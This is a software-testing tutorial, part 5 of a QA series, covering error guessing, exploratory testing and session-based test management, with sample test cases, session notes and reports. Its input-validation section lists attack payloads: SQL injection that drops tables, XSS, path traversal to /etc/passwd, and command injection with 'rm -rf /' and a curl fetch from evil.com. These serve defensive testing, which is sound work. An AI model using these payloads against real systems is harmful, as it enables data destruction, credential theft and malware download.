๐ Series Navigation:
โ Previous: Part 4 - Pairwise Testing
๐ You are here: Part 5 - Error Guessing & Exploratory Testing
Next: Part 6 - Test Coverage Metrics โ
Introduction: When Structure Meets Creativity
Welcome back! So far in this series, we've learned systematic, structured techniques:
- Part 1: Requirement Analysis (ACID Test)
- Part 2: Equivalence Partitioning & BVA (mathematical boundaries)
- Part 3: Decision Tables & State Transitions (logical completeness)
- Part 4: Pairwise Testing (combinatorial mathematics)
These are your science tools. They're repeatable, measurable, and teachable.
But here's the thing: the best bugs aren't found by following scripts.
They're found by QA engineers who:
- Try the "weird" thing nobody thought to test
- Ask "what if I do THIS?" at 4 PM on Friday
- Have that gut feeling that "something's not right here"
- Channel their inner chaos demon and try to break everything
Today we're covering the art of testing:
- Error Guessing - Predicting where bugs hide based on experience and intuition
- Exploratory Testing - Simultaneous learning, test design, and execution
- Session-Based Test Management - Structured approach to unstructured testing
These techniques find the bugs that automation misses, that requirements don't mention, and that make developers say "How did you even think to try that?!"
Let's embrace the chaos! ๐ญ
๐ฏ Error Guessing: The Chaos Demon Within
What is Error Guessing?
Error Guessing is using your experience, intuition, and knowledge of common failure patterns to predict where bugs are likely to hide. It's less "guessing" and more "educated prediction based on years of developers making the same mistakes."
Think of it like this:
- A doctor sees symptoms and thinks "That sounds like flu"
- A mechanic hears a noise and thinks "That's the transmission"
- A QA engineer sees a feature and thinks "I bet they forgot to validate THIS"
The Common Bug Patterns
Here are the classics that keep appearing generation after generation:
1. Input Validation (or Lack Thereof) ๐
The Pattern: Developers trust user input. They shouldn't.
What to try:
SQL Injection Attempts:
โ Email: admin'; DROP TABLE users; --@example.com
โ Password: ' OR '1'='1
โ Search: '; DELETE FROM tasks WHERE '1'='1
XSS (Cross-Site Scripting):
โ Task Title: <script>alert('XSS')</script>
โ Description: <img src=x onerror="alert('XSS')">
โ Username: <iframe src="evil.com"></iframe>
Path Traversal:
โ File download: ../../../etc/passwd
โ Profile image: ../../config/database.yml
โ Export file: ..\..\..\windows\system32\
Command Injection:
โ Filename: test.txt; rm -rf /
โ Email: test@example.com | cat /etc/passwd
โ Search: $(curl evil.com/malware.sh)
TaskMaster 3000 Test Cases:
TC-005-001: SQL Injection in email field during registration
Classification: Security, Negative
Technique: Error Guessing
Test Data:
- Email: "admin'; DROP TABLE users; --@example.com"
- Password: "ValidPass123!"
Expected Result:
โ
Input sanitized/escaped properly
โ
Registration fails with "Invalid email format"
โ
Database remains intact (VERY important!)
โ
No SQL execution logged
โ
Security event logged
โ No error message reveals database structure
Priority: Critical
Type: Security
TC-005-002: XSS in task description
Classification: Security, Negative
Technique: Error Guessing
Test Data:
- Title: "Innocent Task"
- Description: "<script>alert('You have been pwned!')</script>"
Expected Result:
โ
Script tags escaped or removed
โ
When viewing task, no JavaScript executes
โ
Description displays as plain text or HTML-encoded
โ
Browser console shows no errors
โ
No alert popup appears
Verification:
- View task in list
- Open task details
- Edit task (script shouldn't execute in edit mode either)
Priority: Critical
Type: Security
2. Off-by-One Errors ๐
The Pattern: Developers mix up < and <=, or forget that arrays start at 0.
What to try:
TC-005-003: Task title exactly 200 characters (boundary)
Input: "A" * 200
Expected: โ
Accepted
TC-005-004: Task title exactly 201 characters (just over)
Input: "A" * 201
Expected: โ Rejected
TC-005-005: Accessing first item (index 0)
Action: Click first task in list
Expected: โ
Task opens correctly
TC-005-006: Empty list edge case
Precondition: User has 0 tasks
Action: Try to access "first" task
Expected: โ Graceful handling, no crash
3. Unicode & Special Characters ๐
The Pattern: Code works great for ASCII, fails spectacularly for anything else.
What to try:
TC-005-007: Emoji overload in task title
Input:
- Title: "๐ฅ๐ฏ๐๐๐โก๏ธ" * 20 (exceeds 200 char limit with emojis)
- Description: "Testing emoji support ๐"
Expected:
โ
Emojis stored correctly
โ
Emojis display correctly
โ
Character count works properly (emoji = 1 or more chars?)
โ
No encoding corruption
โ
Search still works
TC-005-008: International characters
Input:
- Title: "Tรขche importante avec des accents"
- Description: "ๆต่ฏไธญๆๅญ็ฌฆ and ุงูุนุฑุจูุฉ ู ืขืืจืืช"
Expected:
โ
All characters stored correctly
โ
No encoding issues (UTF-8 throughout)
โ
Sorting works correctly
โ
Search handles international text
TC-005-009: Right-to-left text (Arabic, Hebrew)
Input: Task title in Arabic
Expected:
โ
Text displays right-to-left
โ
UI layout doesn't break
โ
Mixed LTR/RTL text handled gracefully
4. Null, Empty, and Whitespace ๐ฒ
The Pattern: null, empty string "", and whitespace " " are all different, but developers often treat them the same.
What to try:
TC-005-010: Null vs empty vs whitespace password
Tests:
- Password = null (impossible via UI, but test API)
- Password = ""
- Password = " " (8 spaces)
- Password = "\n\t\r" (whitespace characters)
Expected: All rejected appropriately
TC-005-011: Whitespace trimming
Input:
- Email: " user@example.com " (spaces before/after)
- Password: "Pass123! "
Expected:
โ
Whitespace trimmed automatically
โ
Registration succeeds
โ
Can login with trimmed email
TC-005-012: Empty optional fields
Input:
- Title: "Valid Title"
- Description: "" (empty)
- Due date: null (not set)
Expected:
โ
Task created successfully
โ
Empty description stored as null or empty
โ
No "undefined" or "null" displayed in UI
5. Race Conditions & Timing โฑ๏ธ
The Pattern: Code works fine when one user clicks once, breaks when 10 users click simultaneously.
What to try:
TC-005-013: Rapid-fire task creation
Action:
- Use automation to submit "Create Task" 100 times in 1 second
- OR open 10 browser tabs, click Create simultaneously
Expected:
โ
Rate limiting kicks in, OR
โ
All 100 tasks created with unique IDs
โ
No database deadlocks
โ
No duplicate task IDs
โ
No "undefined" tasks
TC-005-014: Double-click on Submit button
Action:
1. Fill registration form
2. Double-click "Register" button very quickly
Expected:
โ
Button disabled after first click
โ
Only ONE account created
โ
No duplicate database entries
โ
No "account already exists" error
TC-005-015: Concurrent edits
Setup: Open same task in 2 browser tabs
Actions:
- Tab 1: Edit title to "Version A", save
- Tab 2: Edit title to "Version B", save simultaneously
Expected:
โ
Last write wins (or conflict detection)
โ
No data corruption
โ
User notified of conflict
โ
No lost data
6. Error Message Information Leakage ๐ต๏ธ
The Pattern: Error messages reveal too much about system internals.
What to try:
TC-005-016: Database error exposure
Action: Cause database error (disconnect DB, invalid query)
Expected:
โ Error message should NOT reveal:
- Database type/version
- Table names
- Column names
- SQL query text
- File paths
โ
Error message should say:
- "Service temporarily unavailable"
- "An error occurred. Please try again."
TC-005-017: Stack trace exposure
Action: Trigger application error
Expected:
โ No stack traces visible to user
โ No file paths revealed
โ No internal variable names
โ
Generic error message
โ
Error logged securely server-side
Building Your Error Guessing Intuition
How to get better at error guessing:
- Study common vulnerability lists
- OWASP Top 10 (web security)
- CWE Top 25 (common weaknesses)
- Read post-mortems and bug reports
- Learn from production incidents
- See patterns across projects
- Think like an attacker
- "If I wanted to break this, how would I?"
- "What did the developer probably forget?"
- Keep a "bug patterns" notebook
- Document bugs you find
- Note the patterns
- Reference in future projects
- Follow security researchers
- Twitter/X, blogs, CVE databases
- See cutting-edge exploits
๐ Exploratory Testing: Structured Discovery
What is Exploratory Testing?
Exploratory Testing is simultaneous learning, test design, and test execution. You're not following a scriptโyou're investigating the application like a detective.
Formal definition:
"Exploratory testing is an approach to software testing that is concisely described as simultaneous learning, test design, and test execution."
โ James Bach
What this means in practice:
Scripted Testing:
1. Read test case
2. Follow steps exactly
3. Record result
4. Move to next test case
Exploratory Testing:
1. Start with a mission
2. Interact with the app
3. Observe behavior
4. Form hypotheses
5. Design next test based on observations
6. Repeat
When Exploratory Testing Shines โจ
Use exploratory testing when:
โ New features with limited documentation
- Requirements are still evolving
- No time to write formal test cases
- Need quick feedback
โ Usability and user experience issues
- "Does this feel right?"
- Workflow confusion
- Visual inconsistencies
โ Complex integrations
- Multiple systems interacting
- Hard to predict all scenarios
- Need to "feel out" the behavior
โ Supplementing automated tests
- Automation covers happy paths
- Exploratory finds the weird stuff
โ Time-constrained situations
- Need to test NOW
- Waiting for test cases isn't an option
Don't use exploratory testing when:
โ Regulatory compliance testing (need documented proof)
โ Regression testing (automation is better)
โ Exact reproducibility required
โ Multiple testers need same steps
๐๏ธ Session-Based Test Management (SBTM)
The Challenge with Exploratory Testing
Problem: "I spent 3 hours testing" isn't helpful for:
- Managers (what did you test?)
- Developers (what did you find?)
- Future you (what areas did you cover?)
Solution: Session-Based Test Management adds structure to exploratory testing without killing its creativity.
The SBTM Framework
60-120 min] B --> C[๐ Explore & Document] C --> D[๐ Write Report] D --> E[๐ค Debrief] E --> F{More Testing?} F -->|Yes| A F -->|No| G[โ Done] style A fill:#dbeafe style B fill:#fef3c7 style C fill:#ddd6fe style D fill:#fecaca style E fill:#bbf7d0 style G fill:#86efac
Step 1: Create a Charter
A charter is your testing missionโwhat you're investigating and why.
Charter template:
EXPLORATORY TEST CHARTER
Session ID: EXP-001
Charter: [MISSION STATEMENT]
Duration: [60-120 minutes]
Tester: [Name]
Date: [YYYY-MM-DD]
MISSION:
Explore [FEATURE/AREA] looking for [TYPES OF ISSUES]
AREAS TO EXPLORE:
- [Specific area 1]
- [Specific area 2]
- [Specific area 3]
RISKS TO INVESTIGATE:
- [Risk 1]
- [Risk 2]
TEST DATA NEEDED:
- [Data requirement 1]
- [Data requirement 2]
Example Charter: Password Reset Flow
EXPLORATORY TEST CHARTER
Session ID: EXP-TaskMaster-001
Charter: Explore password reset functionality for security vulnerabilities
and edge cases
Duration: 90 minutes
Tester: QA Jane
Date: 2025-11-20
MISSION:
Investigate password reset flow looking for:
- Security vulnerabilities
- Edge cases not covered by scripted tests
- Usability issues
- Race conditions
AREAS TO EXPLORE:
1. Email delivery timing and content
2. Reset link expiration behavior
3. Multiple simultaneous reset requests
4. Password validation during reset
5. Browser back/forward button behavior
6. Mobile vs desktop experience
TESTING HEURISTICS TO APPLY:
- Goldilocks (too big, too small, just right)
- Interruptions (close browser, lose connection)
- Time travel (expired links, manipulated timestamps)
- Boundaries (password length limits)
TEST DATA NEEDED:
- 3 test accounts with different email providers
- Various browsers/devices
- Valid and expired reset tokens
RISKS TO INVESTIGATE:
- Can users reset other people's passwords?
- What if reset link is used multiple times?
- What happens if password reset during active session?
- Can reset tokens be predicted/brute-forced?
Step 2: Execute the Session (Time-boxed)
During the session:
- Start timer (90 minutes)
- Focus exclusively on testing (no Slack, no email)
- Take notes as you go (not after!)
- Document findings immediately
- Take screenshots/videos of anything interesting
- Track time breakdown
Sample Session Notes:
SESSION NOTES - EXP-TaskMaster-001
[00:05] Starting session. Test environment ready.
[00:15] ๐ BUG FOUND: Password reset link still works after password changed
Steps:
1. Request password reset for user@example.com
2. Receive reset email
3. Change password via Settings (without using reset link)
4. Click reset link from email
5. BUG: Link still works! Can change password again
Severity: HIGH
Impact: Could allow attacker with email access to override new password
Screenshot: bug-001-reset-link-reuse.png
[00:32] ๐ก OBSERVATION: Reset email takes 5+ minutes with Outlook.com
- Gmail: ~30 seconds
- Outlook: 5-8 minutes
- Yahoo: 2-3 minutes
Not a bug, but UX issue. Users might request multiple resets.
Suggestion: Add message "Email may take up to 10 minutes to arrive"
[00:47] โ
POSITIVE: Mobile layout works well!
- Tested iOS Safari, Android Chrome
- Responsive design good
- Forms easy to fill
- No issues found
[00:55] ๐ BUG FOUND: No rate limiting on reset requests
Steps:
1. Request password reset
2. Immediately request again (x10)
3. BUG: Received 10 emails, no rate limit
Impact: Could be used for email bombing attack
Severity: MEDIUM
Recommendation: Limit to 3 requests per 15 minutes
[01:10] โ QUESTION: Reset link expiration time?
- Docs say "short-lived" but not specific
- Tested: Still works after 2 hours
- Tested: Fails after 24 hours
- Actual expiration: Somewhere between 2-24 hours
Action: Need to clarify with dev team
[01:20] ๐ EXPLORED: Browser back button after reset
- Reset password successfully
- Click browser back button
- Form shows "Password successfully reset"
- Clicking "Reset Again" shows error (link expired)
- Behavior: Correct! โ
[01:25] โฐ SESSION ENDING: Wrapping up notes
TIME BREAKDOWN:
- Test Design & Execution: 60 min (67%)
- Bug Investigation & Documentation: 20 min (22%)
- Session Setup: 10 min (11%)
COVERAGE ASSESSMENT:
โ
Tested: Email delivery, link validity, password validation
โ
Tested: Multiple requests, mobile devices, browser behavior
โ Not Tested: Email client rendering (need more accounts)
โ Not Tested: Accessibility (screen readers) - out of time
BUGS FOUND: 2 (1 High, 1 Medium)
OBSERVATIONS: 2
QUESTIONS: 1
Step 3: Session Report
Report Template:
EXPLORATORY TESTING SESSION REPORT
Session: EXP-TaskMaster-001
Feature: Password Reset Flow
Duration: 90 minutes
Date: 2025-11-20
Tester: QA Jane
CHARTER:
Explore password reset for security issues and edge cases
WHAT WAS TESTED:
โ
Email delivery and timing
โ
Reset link validity and expiration
โ
Multiple reset requests
โ
Mobile responsiveness
โ
Browser navigation behavior
WHAT WAS NOT TESTED (and why):
โ Email client rendering - Need more test accounts
โ Accessibility - Ran out of time, needs separate session
โ Internationalization - Only tested English
โ Slow/unstable networks - Need throttling tools
BUGS FOUND:
1. [HIGH] Reset link works after password changed (BUG-1337)
2. [MEDIUM] No rate limiting on reset requests (BUG-1338)
OBSERVATIONS:
- Outlook.com email delivery very slow (5-8 min)
- Mobile experience is good
- Reset link expiration unclear (between 2-24 hours)
QUESTIONS FOR TEAM:
1. What is the intended reset link expiration time?
2. Should we implement rate limiting? (Recommend: yes)
3. Should reset links be invalidated when password changes? (Recommend: yes)
RISKS DISCOVERED:
โ ๏ธ Email access = password control (even after password change)
โ ๏ธ Potential for email bombing attack
RECOMMENDED NEXT STEPS:
โก Fix HIGH severity bug before release
โก Clarify and document reset link expiration
โก Add rate limiting (3 requests / 15 min)
โก Schedule follow-up session for accessibility testing
TIME BREAKDOWN:
- Execution: 67%
- Documentation: 22%
- Setup: 11%
SESSION RATING: ๐๐๐๐ (4/5)
Found critical bugs, good coverage, time well spent
Step 4: Debrief
Debrief meeting (15-30 minutes):
Attendees:
- Tester(s) who ran session
- Relevant stakeholders (dev lead, product owner)
Agenda:
- Present findings (5-10 min)
- Discuss bugs and priority (5-10 min)
- Answer questions (5-10 min)
- Plan next steps (5 min)
Sample Debrief:
DEBRIEF NOTES - EXP-TaskMaster-001
Attendees: QA Jane, Dev Lead Mike, PM Sarah
KEY FINDINGS PRESENTED:
โ
Found 2 bugs (1 HIGH, 1 MEDIUM)
โ
Identified usability improvement (email delay message)
โ
Discovered unclear requirement (reset expiration time)
DECISIONS MADE:
1. BUG-1337 (reset link reuse) โ Fix immediately, blocks release
2. BUG-1338 (rate limiting) โ Fix in this sprint, medium priority
3. Email delay message โ Add to backlog for future sprint
4. Reset expiration โ Dev team will clarify and document
QUESTIONS ANSWERED:
Q: What's the reset link expiration?
A: Intended to be 24 hours, will add test to verify
Q: Why no automated tests for this?
A: Complex timing issues, good for exploratory first
FOLLOW-UP ACTIONS:
โก Mike: Fix BUG-1337 by Thursday
โก Mike: Implement rate limiting
โก Sarah: Update requirements doc with expiration time
โก Jane: Create bug reports for both issues
โก Jane: Schedule accessibility testing session next week
WHAT WORKED WELL:
โ
Time-boxing kept session focused
โ
Found issues scripts would have missed
โ
Good documentation during session
WHAT COULD IMPROVE:
โ ๏ธ Need better test data setup (more email accounts)
โ ๏ธ 90 min felt slightly long, try 60 min next time
NEXT CHARTER IDEAS:
1. Explore account lockout after failed login attempts
2. Investigate task attachment upload security
3. Test password strength meter accuracy
๐ฏ Combining Error Guessing with Exploratory Testing
The most powerful approach? Combine them!
Example Session Charter:
EXPLORATORY TEST CHARTER
Charter: Explore task creation for security vulnerabilities and edge cases
Duration: 90 minutes
MISSION:
Use error guessing to test task creation for common security issues,
then explore unexpected behaviors
ERROR GUESSING CHECKLIST:
โก SQL injection in title/description
โก XSS attempts in all text fields
โก Path traversal in file attachments
โก Emoji/Unicode in all fields
โก Null/empty/whitespace inputs
โก Extremely long inputs (>1MB)
โก Race conditions (rapid task creation)
โก Special characters in all fields
EXPLORATORY FOCUS:
After checklist, freely explore:
- Task creation workflow
- Interaction with other features
- Mobile vs desktop differences
- Anything that "feels wrong"
EXPECTED TIME:
- Error guessing checklist: 30-40 min
- Free exploration: 50-60 min
This gives you:
- โ Structure from error guessing patterns
- โ Coverage of known vulnerabilities
- โ Creativity from free exploration
- โ Best of both worlds
๐ก Practical Tips
For Error Guessing
Do's โ :
- Maintain a "bug patterns" database from past projects
- Think like an attacker - "How would I break this?"
- Test the unexpected - Users will definitely try it
- Document your attempts - Even if no bugs found
- Share findings - Help team learn common patterns
Don'ts โ:
- Don't only test happy paths - Errors hide in darkness
- Don't assume "the UI prevents it" - Test the API too
- Don't skip security testing - It's not "someone else's job"
- Don't test randomly - Use patterns and experience
For Exploratory Testing
Do's โ :
- Use time-boxing - Prevents endless wandering
- Take notes immediately - Memory is unreliable
- Focus on one charter - Don't try to test everything
- Debrief promptly - While session is fresh
- Combine with scripted tests - They complement each other
Don'ts โ:
- Don't skip the charter - "Just testing randomly" isn't exploratory
- Don't multitask - Close Slack, focus on testing
- Don't document after - Take notes during session
- Don't explore without purpose - Have a mission
- Don't forget to report findings - Exploration without documentation is wasted
๐ Real Results
Case Study: E-commerce Checkout
Context: Major e-commerce platform, payment processing flow
Scripted Testing Results:
- 45 test cases executed
- 3 bugs found
- All "expected" scenarios covered
Exploratory Testing (2 sessions, 180 min total):
- 0 formal test cases
- 11 bugs found, including:
- 1 CRITICAL: Race condition allowing double charges
- 2 HIGH: XSS in order notes field
- 3 MEDIUM: Error message leaking customer data
- 5 LOW: Usability issues
Impact:
- Prevented double-charging customers (would have been massive PR disaster)
- Fixed security issues before security audit
- Improved checkout conversion rate by 2% (UX fixes)
ROI:
- Time invested: 180 minutes
- Issues prevented: Potentially millions in damages + reputation
- Customer trust: Priceless
๐ Conclusion: Embrace Your Inner Chaos Demon
Testing isn't just about following proceduresโit's about curiosity, creativity, and controlled chaos.
Key Takeaways
- Error guessing is educated prediction, not random luck. Learn patterns, build intuition, think like an attacker.
- Exploratory testing finds bugs automation misses. The combination of human creativity and systematic exploration is powerful.
- SBTM makes exploratory testing measurable. Charters, time-boxing, and debriefs provide structure without killing creativity.
- Combine techniques. Use error guessing patterns within exploratory sessions. Balance scripted and exploratory testing.
- Document everything. Notes during session, reports after, debriefs with team. Your findings only matter if people know about them.
Your Action Plan
This week:
- โ Create your first exploratory testing charter
- โ Run a 60-minute session
- โ Document with SBTM format
- โ Share findings with team
This month:
- โ Build your "bug patterns" notebook
- โ Schedule regular exploratory sessions (1-2 per week)
- โ Review OWASP Top 10
- โ Teach error guessing to junior QA
This year:
- โ Develop strong security testing skills
- โ Master SBTM framework
- โ Become the "bug whisperer" on your team
What's Next?
In Part 6, we return to structure and metrics. We'll explore Test Coverage in depthโhow to measure it, what actually matters, and how to prove your testing is effective without drowning in meaningless numbers.
We'll cover:
- Requirement vs Code coverage
- The test pyramid (with real numbers)
- Metrics that actually help
- Dashboards that tell a story
Coming Next Week:
Part 6: Test Coverage Metrics - What Actually Matters ๐
๐ Series Progress
โ
Part 1: Requirement Analysis
โ
Part 2: Equivalence Partitioning & BVA
โ
Part 3: Decision Tables & State Transitions
โ
Part 4: Pairwise Testing
โ
Part 5: Error Guessing & Exploratory Testing โ You just finished this!
โฌ Part 6: Test Coverage Metrics
โฌ Part 7: Real-World Case Study
โฌ Part 8: Modern QA Workflow
โฌ Part 9: Bug Reports That Get Fixed
โฌ Part 10: The QA Survival Kit
๐งฎ Quick Reference Card
Error Guessing Checklist
SECURITY:
โก SQL injection in all text inputs
โก XSS in all user content
โก Path traversal in file operations
โก Command injection in system calls
โก Authentication bypass attempts
โก Authorization escalation
INPUT VALIDATION:
โก Null values
โก Empty strings
โก Whitespace only
โก Extremely long inputs
โก Special characters
โก Unicode & emojis
โก Negative numbers (where positive expected)
TIMING & CONCURRENCY:
โก Rapid button clicks (double-click)
โก Simultaneous operations
โก Very slow connections
โก Timeouts and interruptions
โก Race conditions
ERROR HANDLING:
โก Information leakage in errors
โก Stack trace exposure
โก Database error messages
โก File path disclosure
SBTM Session Checklist
BEFORE SESSION:
โก Create charter with clear mission
โก Set time box (60-120 min)
โก Prepare test data
โก Clear calendar (no interruptions)
โก Setup note-taking tools
DURING SESSION:
โก Start timer
โก Take notes continuously
โก Screenshot interesting findings
โก Track time breakdown
โก Stay focused on charter
AFTER SESSION:
โก Write session report
โก Create bug reports
โก Calculate time breakdown
โก Schedule debrief
โก Plan next session
DEBRIEF:
โก Present findings
โก Discuss priority
โก Answer questions
โก Plan follow-up actions
โก Document decisions
Remember: The best bugs are found by those brave enough to try the weird stuff! ๐ฅ
What's your favorite bug you've found through exploratory testing? Share in the comments!